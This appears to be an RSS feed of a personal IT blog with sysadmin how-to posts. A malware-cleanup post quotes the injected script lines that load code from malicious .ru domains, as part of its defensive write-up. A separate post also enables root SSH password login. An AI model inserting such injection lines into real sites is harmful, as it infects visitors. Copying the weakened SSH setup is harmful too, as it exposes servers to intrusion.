<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>vNate</title>
	<atom:link href="http://www.natestiller.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.natestiller.com</link>
	<description>...about virtually anything!</description>
	<lastBuildDate>Sat, 31 Mar 2012 15:15:42 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.2</generator>
		<item>
		<title>Enable root user password login on EC2 Ubuntu</title>
		<link>http://www.natestiller.com/2012/03/enable-root-user-password-login-on-ec2-ubuntu/</link>
		<comments>http://www.natestiller.com/2012/03/enable-root-user-password-login-on-ec2-ubuntu/#comments</comments>
		<pubDate>Thu, 22 Mar 2012 18:20:31 +0000</pubDate>
		<dc:creator>Nate</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[ec2]]></category>
		<category><![CDATA[enable]]></category>
		<category><![CDATA[login]]></category>
		<category><![CDATA[password]]></category>
		<category><![CDATA[root]]></category>
		<category><![CDATA[ubuntu]]></category>

		<guid isPermaLink="false">http://www.natestiller.com/?p=166</guid>
		<description><![CDATA[Even though it&#8217;s not recommended, sometimes it&#8217;s easier to just log in as root. Here&#8217;s how to enable the root user login on your Ubuntu based EC2 instance: &#160; Create a password for the root user:      sudo passwd root Edit your SSHd config to allow password based logins:      sudo nano -w [...]]]></description>
			<content:encoded><![CDATA[<p>Even though it&#8217;s not recommended, sometimes it&#8217;s easier to just log in as root. Here&#8217;s how to enable the root user login on your Ubuntu based EC2 instance:</p>
<p>&nbsp;</p>
<p>Create a password for the root user:</p>
<p><code>     sudo passwd root</code></p>
<p>Edit your SSHd config to allow password based logins:</p>
<p><code>     sudo nano -w /etc/ssh/sshd_config</code></p>
<p>Add the following line to /etc/ssh/sshd_config:</p>
<p><code>     PasswordAuthentication yes</code></p>
<p>Copy your authorized SSH keys if you want to log in via keys as well:</p>
<p><code>     sudo mkdir /root/.ssh</code><br />
<code>     sudo cp /home/ubuntu/.ssh/authorized_keys /root/.ssh/</code></p>
<p>Reload your SSHd config:</p>
<p><code>     sudo reload ssh</code></p>
<p>Now you can login as root!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.natestiller.com/2012/03/enable-root-user-password-login-on-ec2-ubuntu/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Windows Server 2008 and Upgrading VMware Tools gives vmci.sys 0xc0000098 BSOD</title>
		<link>http://www.natestiller.com/2012/02/windows-server-2008-and-upgrading-vmware-tools-gives-vmci-sys-0xc0000098-bsod/</link>
		<comments>http://www.natestiller.com/2012/02/windows-server-2008-and-upgrading-vmware-tools-gives-vmci-sys-0xc0000098-bsod/#comments</comments>
		<pubDate>Wed, 15 Feb 2012 14:29:36 +0000</pubDate>
		<dc:creator>Nate</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[0xc0000098]]></category>
		<category><![CDATA[bluescreen]]></category>
		<category><![CDATA[BSOD]]></category>
		<category><![CDATA[Upgrading VMware Tools]]></category>
		<category><![CDATA[vmci.sys]]></category>
		<category><![CDATA[Windows Server 2008]]></category>

		<guid isPermaLink="false">http://www.natestiller.com/?p=161</guid>
		<description><![CDATA[I just experienced a vmci.sys 0xc0000098 BSOD bluescreen on upgrading VMware Tools on Windows Server 2008 (not R2) and was stuck in an endless reboot loop. It would not even boot into safe mode. However, I used &#8220;Last Known Good Configuration&#8221; while booting up, and it fixed the issue and allowed me to boot into [...]]]></description>
			<content:encoded><![CDATA[<p>I just experienced a vmci.sys 0xc0000098 BSOD bluescreen on upgrading VMware Tools on Windows Server 2008 (not R2) and was stuck in an endless reboot loop. It would not even boot into safe mode. However, I used &#8220;Last Known Good Configuration&#8221; while booting up, and it fixed the issue and allowed me to boot into Windows. A quick Google search didn&#8217;t result anything similar so I figured I&#8217;d share my findings. Comment if it works for you! </p>
]]></content:encoded>
			<wfw:commentRss>http://www.natestiller.com/2012/02/windows-server-2008-and-upgrading-vmware-tools-gives-vmci-sys-0xc0000098-bsod/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Sending Notifo notifications using PHP</title>
		<link>http://www.natestiller.com/2011/09/sending-notifo-notifications-using-php/</link>
		<comments>http://www.natestiller.com/2011/09/sending-notifo-notifications-using-php/#comments</comments>
		<pubDate>Wed, 21 Sep 2011 15:34:54 +0000</pubDate>
		<dc:creator>Nate</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.natestiller.com/?p=162</guid>
		<description><![CDATA[I coud not find any decent functions to send notifications to my Notifo account using PHP so I made one. It&#8217;s highly customizable and easy to use. Check it out:]]></description>
			<content:encoded><![CDATA[<p>I coud not find any decent functions to send notifications to my Notifo account using PHP so I made one. It&#8217;s highly customizable and easy to use. Check it out:</p>
<p><iframe src="http://pastebin.com/embed_iframe.php?i=ysSfztWQ" style="border:none;width:100%;height:300px"></iframe></p>
]]></content:encoded>
			<wfw:commentRss>http://www.natestiller.com/2011/09/sending-notifo-notifications-using-php/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>VCS vSphere &#8211; Check new notifications stuck on Queued &#8211; VMware vCenter Update Manager Check Notification</title>
		<link>http://www.natestiller.com/2011/02/vcs-vsphere-check-new-notifications-stuck-on-queued-vmware-vcenter-update-manager-check-notification/</link>
		<comments>http://www.natestiller.com/2011/02/vcs-vsphere-check-new-notifications-stuck-on-queued-vmware-vcenter-update-manager-check-notification/#comments</comments>
		<pubDate>Mon, 07 Feb 2011 15:05:44 +0000</pubDate>
		<dc:creator>Nate</dc:creator>
				<category><![CDATA[ESX]]></category>
		<category><![CDATA[How To]]></category>
		<category><![CDATA[Randomness]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[VIClient]]></category>
		<category><![CDATA[VMware]]></category>

		<guid isPermaLink="false">http://www.natestiller.com/?p=153</guid>
		<description><![CDATA[So if you have a bunch of queued items in your VMware vSphere Client Recent Tasks that say &#8220;Check new notifications&#8221; initiated by &#8220;VMware vCenter Update Manager Check Notification&#8220;, there is an easy fix. Here&#8217;s what it looks like: To fix, all you have to do is restart the VMware vCenter Update Manager Service on [...]]]></description>
			<content:encoded><![CDATA[<p>So if you have a bunch of queued items in your VMware vSphere Client Recent Tasks that say &#8220;<em>Check new notifications</em>&#8221; initiated by &#8220;<em>VMware vCenter Update Manager Check Notification</em>&#8220;, there is an easy fix. Here&#8217;s what it looks like:</p>
<p><a href="http://www.natestiller.com/wp-content/uploads/2011/02/vcs-ss-1.jpg"><img class="aligncenter size-full wp-image-154" title="vSphere Client - Check new notifications hung" src="http://www.natestiller.com/wp-content/uploads/2011/02/vcs-ss-1.jpg" alt="" width="575" height="427" /></a></p>
<p>To fix, all you have to do is <strong>restart </strong>the <strong>VMware vCenter Update Manager Service</strong> on your VCS server. See below:</p>
<p><a href="http://www.natestiller.com/wp-content/uploads/2011/02/vcs-ss-2.jpg"><img class="aligncenter size-full wp-image-155" title="VCS Service" src="http://www.natestiller.com/wp-content/uploads/2011/02/vcs-ss-2.jpg" alt="" width="575" height="480" /></a></p>
<p>You can also do a <em>&#8220;net stop vmware-ufad-vci&#8221;</em> then a<em> &#8220;net start vmware-ufad-vci&#8221;<em> </em></em>as well<em>.</em> Let me know if this works out for you! <img src='http://www.natestiller.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://www.natestiller.com/2011/02/vcs-vsphere-check-new-notifications-stuck-on-queued-vmware-vcenter-update-manager-check-notification/feed/</wfw:commentRss>
		<slash:comments>14</slash:comments>
		</item>
		<item>
		<title>Microsoft KB2501696 MHTML Vulnerability Test and Quick Fix Workaround &#8211; Group Policy Friendly</title>
		<link>http://www.natestiller.com/2011/01/microsoft-kb2501696-mhtml-bug-vulnerability/</link>
		<comments>http://www.natestiller.com/2011/01/microsoft-kb2501696-mhtml-bug-vulnerability/#comments</comments>
		<pubDate>Mon, 31 Jan 2011 16:59:09 +0000</pubDate>
		<dc:creator>Nate</dc:creator>
				<category><![CDATA[How To]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[MHTML]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Vulnerability]]></category>

		<guid isPermaLink="false">http://www.natestiller.com/?p=138</guid>
		<description><![CDATA[All Microsoft platforms since Windows XP SP3 are affected with this pretty nasty vulnerability. Referencing KB2501696 shows that this bug is caused by the way Windows handles MHTML documents. Internet Explorer is not the one at fault here, this is a Windows bug, however IE will be the attack vector for anyone wanting to take [...]]]></description>
			<content:encoded><![CDATA[<p>All Microsoft platforms since Windows XP SP3 are affected with this pretty nasty vulnerability. Referencing <a href="http://support.microsoft.com/kb/2501696">KB2501696</a> shows that this bug is caused by the way Windows handles MHTML documents. Internet Explorer is not the one at fault here, this is a Windows bug, however IE will be the attack vector for anyone wanting to take advantage of this flaw (and they <em>will</em>).</p>
<p><strong>First off, to see if you are affected, <a href="http://www.natestiller.com/KB2501696.mht" target="_blank">follow this test link using Internet Explorer</a>.</strong> If you get a popup box saying you are affected, then you should apply this fix right away. Also, make sure you are using Internet Explorer since most other browsers do not use the Windows MHTML libraries.</p>
<p>Microsoft gives a lame &#8220;FixIt&#8221; MSI that is not very GPO friendly. So I went out and wrote my own fix for it. It&#8217;s a batch script that you can run locally on a single computer or deploy as a &#8220;startup/shutdown script&#8221; in Group Policy without any edits needed. It is also compatible with x86 and x64 bit machines. Copy the following into your favorite text editor and give it a &#8220;.cmd&#8221; extension.</p>
<p><iframe src="http://pastebin.com/embed_iframe.php?i=TnBTJpnx" style="border:none;height:200px;width:100%"></iframe></p>
<p>You can also <a href="http://www.natestiller.com/KB2501696fix.cmd.txt">click here</a> to download it. Comment below and let me know how this works for you or if you have any other questions/comments/improvements!</p>
<p>Thanks!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.natestiller.com/2011/01/microsoft-kb2501696-mhtml-bug-vulnerability/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Getting pocketbloke.ru, inkrainbow.ru, pantsletter.ru JavaScript and PHP malware code injection hacks/infection? Get the fix here!</title>
		<link>http://www.natestiller.com/2010/08/pocketbloke-ru-inkrainbow-ru-javascript-php-malware-attack-hacked/</link>
		<comments>http://www.natestiller.com/2010/08/pocketbloke-ru-inkrainbow-ru-javascript-php-malware-attack-hacked/#comments</comments>
		<pubDate>Tue, 17 Aug 2010 17:28:44 +0000</pubDate>
		<dc:creator>Nate</dc:creator>
				<category><![CDATA[Malware]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[Randomness]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://www.natestiller.com/?p=105</guid>
		<description><![CDATA[I have put together a PHP script to automatically remove all traces of this malicious code from your website. All you have to do is upload the script to the root of your web directory then access the page with any browser. I&#8217;ve built in many features including folder and file recursion, file extension filtering, [...]]]></description>
			<content:encoded><![CDATA[<p>I have put together a PHP script to automatically remove all traces of this malicious code from your website. All you have to do is upload the script to the root of your web directory then access the page with any browser. I&#8217;ve built in many features including folder and file recursion, file extension filtering, automatic file backups, and two modes of operation:  search only and search and fix.</p>
<p><strong><a href="http://www.natestiller.com/malware/" target="_blank">Click here to see the .RU Removal Script in action! (demo) </a></strong></p>
<p>or&#8230;</p>
<h3><a href="http://www.natestiller.com/fixfiles.php.txt" target="_blank">Click here for the .RU Removal Script Source Code</a></h3>
<h3>or <a href="http://pastebin.com/tGa6NXNZ" target="_blank">here for it on PasteBin</a></h3>
<p>Let me know in the comments if it works for you or if you have any feature requests!</p>
<p>Thanks to everyone commenting below, we have found out that malware on  your PC is stealing your FTP credentials to websites you have access to.  They have an automatic script that will login to your site using FTP  and append a link to PHP and JS files containing their malicious code.</p>
<p>It looks like this in JavaScript files:</p>
<pre>document.write('&lt;sc'+'ript type="text/javascript" src="http://pocketbloke.ru/
Template.js"&gt;&lt;/scri'+'pt&gt;');</pre>
<p>PHP or HTML files contain the following at the end:</p>
<pre>&lt;script type="text/javascript" src="http://inkrainbow.ru/Template.js"&gt;&lt;/script&gt;
&lt;!--3848d52fcd665b3d7d96c22e5b6a5451--&gt;</pre>
<p>Here is a short list of some domain names that we&#8217;ve come across&#8230;</p>
<p><strong>Known Malicious Domains:</strong></p>
<ul>
<li>pocketbloke.ru</li>
<li>inkrainbow.ru</li>
<li>pantsletter.ru</li>
<li>fightkid.ru</li>
<li>shirtdifficulty.ru</li>
<li>casechick.ru</li>
<li>obscurewax.ru</li>
<li>nuttypiano.com</li>
<li>Many others&#8230; (comment domains you find below)</li>
</ul>
<p><strong>STEPS TO TAKE TO REMOVE THE THREAT:</strong></p>
<ol>
<li>Run <a href="http://download.cnet.com/Malwarebytes-Anti-Malware/3000-8022_4-10804572.html?part=dl-10804572&amp;subj=dl&amp;tag=button" target="_blank">MalwareBytes</a> and get rid of anything on your machine</li>
<li>Uninstall your FTP client</li>
<li>Change your FTP passwords</li>
<li>Update <a href="http://www.java.com/en/download/manual.jsp" target="_blank">JAVA</a> &#8211; According to <a href="http://www.kb.cert.org/vuls/id/886582" target="_blank">this CERT KB</a></li>
<li>Remove all traces of the scripts from your domains</li>
</ol>
<p><strong>UPDATE (8/26/2010): </strong>Now more than just .RU are involved which means the script in its current state won&#8217;t detect it. Working on a new way to detect this issue. Any ideas? Comment below.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.natestiller.com/2010/08/pocketbloke-ru-inkrainbow-ru-javascript-php-malware-attack-hacked/feed/</wfw:commentRss>
		<slash:comments>111</slash:comments>
		</item>
		<item>
		<title>VMware vSphere Clone Error Fix &#8211; &#8220;Number of virtual devices exceeds the maximum for a given controller.&#8221;</title>
		<link>http://www.natestiller.com/2010/05/number-of-virtual-devices-exceeds-the-maximum-for-a-given-controller/</link>
		<comments>http://www.natestiller.com/2010/05/number-of-virtual-devices-exceeds-the-maximum-for-a-given-controller/#comments</comments>
		<pubDate>Wed, 12 May 2010 20:18:02 +0000</pubDate>
		<dc:creator>Nate</dc:creator>
				<category><![CDATA[ESX]]></category>
		<category><![CDATA[How To]]></category>
		<category><![CDATA[VIClient]]></category>
		<category><![CDATA[VMware]]></category>

		<guid isPermaLink="false">http://www.natestiller.com/?p=99</guid>
		<description><![CDATA[If you get the following error when you try and clone a VM in vSphere 4: Then you must be checking the &#8220;Edit virtual hardware (Experimental)&#8221; box when you are cloning&#8230; DON&#8217;T DO THAT! Leave it unchecked and you won&#8217;t have any problems&#8230; Let me know if that works for you]]></description>
			<content:encoded><![CDATA[<p>If you get the following error when you try and clone a VM in vSphere 4:</p>
<p><a href="http://www.natestiller.com/wp-content/uploads/2010/05/vm1.jpg"><img class="aligncenter size-medium wp-image-100" title="Clone Error" src="http://www.natestiller.com/wp-content/uploads/2010/05/vm1-300x43.jpg" alt="" width="300" height="43" /></a></p>
<p>Then you must be checking the &#8220;Edit virtual hardware (Experimental)&#8221; box when you are cloning&#8230; DON&#8217;T DO THAT! <strong>Leave it unchecked</strong> and you won&#8217;t have any problems&#8230;</p>
<p><a href="http://www.natestiller.com/wp-content/uploads/2010/05/vm2.jpg"><img class="aligncenter size-medium wp-image-101" title="Leave Unchecked!" src="http://www.natestiller.com/wp-content/uploads/2010/05/vm2-300x225.jpg" alt="" width="300" height="225" /></a></p>
<p>Let me know if that works for you <img src='http://www.natestiller.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://www.natestiller.com/2010/05/number-of-virtual-devices-exceeds-the-maximum-for-a-given-controller/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Use PHP to check used and free space on remote computers</title>
		<link>http://www.natestiller.com/2009/11/use-php-to-check-used-and-free-space-on-remote-computers/</link>
		<comments>http://www.natestiller.com/2009/11/use-php-to-check-used-and-free-space-on-remote-computers/#comments</comments>
		<pubDate>Thu, 19 Nov 2009 15:23:26 +0000</pubDate>
		<dc:creator>Nate</dc:creator>
				<category><![CDATA[Google Charts]]></category>
		<category><![CDATA[How To]]></category>
		<category><![CDATA[PHP]]></category>

		<guid isPermaLink="false">http://www.natestiller.com/?p=85</guid>
		<description><![CDATA[Using Google Charts API, PHP, and wmic together allows you to create awesome reports of used and free hard drive space. This is a Windows only script. Check out the code below!]]></description>
			<content:encoded><![CDATA[<div id="attachment_87" class="wp-caption aligncenter" style="width: 585px"><img class="size-full wp-image-87" title="PHP Drive Space Report" src="http://www.natestiller.com/wp-content/uploads/2009/11/phpdrives.jpg" alt="PHP Drive Space Report" width="575" height="397" /><p class="wp-caption-text">PHP Drive Space Report</p></div>
<p>Using Google Charts API, PHP, and wmic together allows you to create awesome reports of used and free hard drive space. This is a Windows only script. Check out the code below!</p>
<p><iframe src="http://pastebin.com/embed_iframe.php?i=t4xg84gV" style="border:none;width:100%;height:700px"></iframe></p>
]]></content:encoded>
			<wfw:commentRss>http://www.natestiller.com/2009/11/use-php-to-check-used-and-free-space-on-remote-computers/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>What is Thumbs.db? And how do I get rid of the Thumbs.db file?!</title>
		<link>http://www.natestiller.com/2009/09/what-is-thumbs-db-and-how-do-i-get-rid-of-the-thumbs-db-file/</link>
		<comments>http://www.natestiller.com/2009/09/what-is-thumbs-db-and-how-do-i-get-rid-of-the-thumbs-db-file/#comments</comments>
		<pubDate>Mon, 14 Sep 2009 16:14:28 +0000</pubDate>
		<dc:creator>Nate</dc:creator>
				<category><![CDATA[How To]]></category>
		<category><![CDATA[Windows XP]]></category>

		<guid isPermaLink="false">http://www.natestiller.com/?p=75</guid>
		<description><![CDATA[Ahhhhh! This stupid thumbs.db file is showing up everywhere and I can&#8217;t get rid of it! What is it and why is it in almost every folder? Thumbs.db is a &#8220;Windows Thumbnail Cache&#8221; file. This file stores thumbnails of all thumbnail-able items in that one folder for quicker viewing access. These include files with the [...]]]></description>
			<content:encoded><![CDATA[<p><em>Ahhhhh! This stupid thumbs.db file is showing up everywhere and I can&#8217;t get rid of it! What is it and why is it in almost every folder?</em></p>
<p><em><img class="aligncenter size-full wp-image-80" title="Thumbs.db" src="http://www.natestiller.com/wp-content/uploads/2009/09/thumb.jpg" alt="Thumbs.db" width="123" height="131" /><br />
</em></p>
<p>Thumbs.db is a &#8220;Windows Thumbnail Cache&#8221; file. This file stores thumbnails of all <em>thumbnail-able</em> items in that one folder for quicker viewing access. These include files with the following extensions: JPEG, BMP, GIF, PNG, TIFF, AVI, PDF, PPT and HTML.</p>
<p style="text-align: left;"><em>Will I lose my pictures or the ability to view thumbnails if I delete this file?</em><br />
No you won&#8217;t lose any data or functionality if you delete the thumbs.db file&#8230; but it will keep coming back unless you do the following:</p>
<ol>
<li>Double click the &#8220;My Computer&#8221; icon on your Desktop or Start Menu to bring up an Explorer window.</li>
<li>On the top menu, click &#8220;Options&#8221; and then &#8220;Folder Options&#8221;<br />
<img class="alignnone size-medium wp-image-81" title="Explorer Window" src="http://www.natestiller.com/wp-content/uploads/2009/09/folderoptions-300x269.jpg" alt="Explorer Window" width="300" height="269" /></li>
<li>Click the &#8220;View&#8221; tab and check the &#8220;Do not cache thumbnails&#8221; options.<br />
<img class="alignnone size-medium wp-image-82" title="Do not cache thumbnails" src="http://www.natestiller.com/wp-content/uploads/2009/09/options-243x300.jpg" alt="Do not cache thumbnails" width="243" height="300" /></li>
</ol>
<p>That&#8217;s it!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.natestiller.com/2009/09/what-is-thumbs-db-and-how-do-i-get-rid-of-the-thumbs-db-file/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>PHP PC Live Screenshot Script</title>
		<link>http://www.natestiller.com/2009/08/php-pc-live-screenshot-script/</link>
		<comments>http://www.natestiller.com/2009/08/php-pc-live-screenshot-script/#comments</comments>
		<pubDate>Wed, 26 Aug 2009 13:03:27 +0000</pubDate>
		<dc:creator>Nate</dc:creator>
				<category><![CDATA[How To]]></category>
		<category><![CDATA[PHP]]></category>

		<guid isPermaLink="false">http://www.natestiller.com/?p=59</guid>
		<description><![CDATA[Have you ever wanted to take live screenshots of a group of PCs to see what is going on? I&#8217;ve created a PHP script that teams up with a few remote control applications that does it for you! Features include: Instant screenshots of remote PCs Refresh any PC&#8217;s image with 1 click Shows currently logged [...]]]></description>
			<content:encoded><![CDATA[<p>Have you ever wanted to take live screenshots of a group of PCs to see what is going on? I&#8217;ve created a PHP script that teams up with a few remote control applications that does it for you!</p>
<p>Features include:</p>
<ul>
<li>Instant screenshots of remote PCs</li>
<li>Refresh any PC&#8217;s image with 1 click</li>
<li>Shows currently logged on username</li>
<li>Searches Active Directory for user&#8217;s information and displays full name and other custom fields</li>
<li>Fully configurable and customizable</li>
</ul>
<div id="attachment_66" class="wp-caption aligncenter" style="width: 585px"><img class="size-full wp-image-66" title="PHP SS 1" src="http://www.natestiller.com/wp-content/uploads/2009/08/51.jpg" alt="PHP SS Overview" width="575" height="223" /><p class="wp-caption-text">PHP SS Overview</p></div>
<div id="attachment_65" class="wp-caption aligncenter" style="width: 585px"><img class="size-full wp-image-65" title="PHP SS 2" src="http://www.natestiller.com/wp-content/uploads/2009/08/61.jpg" alt="PHP SS Zoom View" width="575" height="349" /><p class="wp-caption-text">PHP SS Zoom View</p></div>
<p>Here is a list of what you need to download:</p>
<ul>
<li><a href="http://www.wampserver.com/en/" target="_blank">WAMPServer</a></li>
<li><a href="http://www.irfanview.com/" target="_blank">IrfanView</a></li>
<li><a href="http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx" target="_blank">PsExec (Included in PsTools)</a></li>
<li><a href="http://www.natestiller.com/PHPSS.zip">The PHP Script</a></li>
</ul>
<p>After downloading all of the software, follow these steps:</p>
<ol>
<li>Install WampServer to the default folders and options</li>
<li>Left click the new WampServer icon in your tray and select &#8220;Put Online&#8221;<br />
<img class="alignnone size-full wp-image-69" title="PHP SS 3" src="http://www.natestiller.com/wp-content/uploads/2009/08/1.jpg" alt="PHP SS 3" width="293" height="275" /></li>
<li>Again, left click the new WampServer icon in your tray, choose PHP -&gt; PHP Settings -&gt; Uncheck &#8220;Display Errors&#8221;<br />
<img class="alignnone size-full wp-image-72" title="PHP SS 6" src="http://www.natestiller.com/wp-content/uploads/2009/08/4.jpg" alt="PHP SS 6" width="416" height="665" /></li>
<li>Go to start, click Run&#8230;, type in &#8220;services.msc&#8221; and hit enter. Scroll all of the way down until you find &#8220;wampapache&#8221;. Double click on it to bring up the properties window.<br />
<img class="alignnone size-full wp-image-70" title="PHP SS 4" src="http://www.natestiller.com/wp-content/uploads/2009/08/2.jpg" alt="PHP SS 4" width="575" height="431" /></li>
<li>Change the startup type to &#8220;Automatic&#8221;, then click the Log On tab. Select &#8220;This account&#8221; and enter in the credentials of a user with proper remote execution rights on the domain.<br />
<img class="alignnone size-full wp-image-71" title="PHP SS 5" src="http://www.natestiller.com/wp-content/uploads/2009/08/3.jpg" alt="PHP SS 5" width="410" height="467" /></li>
<li>Hit OK to close the properties window, right click on the &#8220;wampapache&#8221; service and choose restart. Close the Services window</li>
<li>Extract PsTools.zip into the C:\Windows\System32 folder. Overwrite any existing files. Run PsExec.exe and click agree on the EULA.</li>
<li>Install IrfanView, after installing, copy the i_view32.exe executable and paste it into the system32 folder.</li>
<li>Open up an explorer window and browse to &#8220;C:\wamp\www&#8221; and delete the index.php file.</li>
<li>Extract the contents of the &#8220;PHPSS.zip&#8221; file into the &#8220;C:\wamp\www&#8221; folder</li>
<li>Use your favorite text editor and open up &#8220;index.php&#8221;. Lines 10-30 are made to be easily configurable to fit your network&#8217;s structure. Make sure you change the computer naming scheme to work with yours.</li>
<li>Start up a web browser and point to http://localhost and try it out! Comment and let me know how it goes <img src='http://www.natestiller.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </li>
</ol>
]]></content:encoded>
			<wfw:commentRss>http://www.natestiller.com/2009/08/php-pc-live-screenshot-script/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

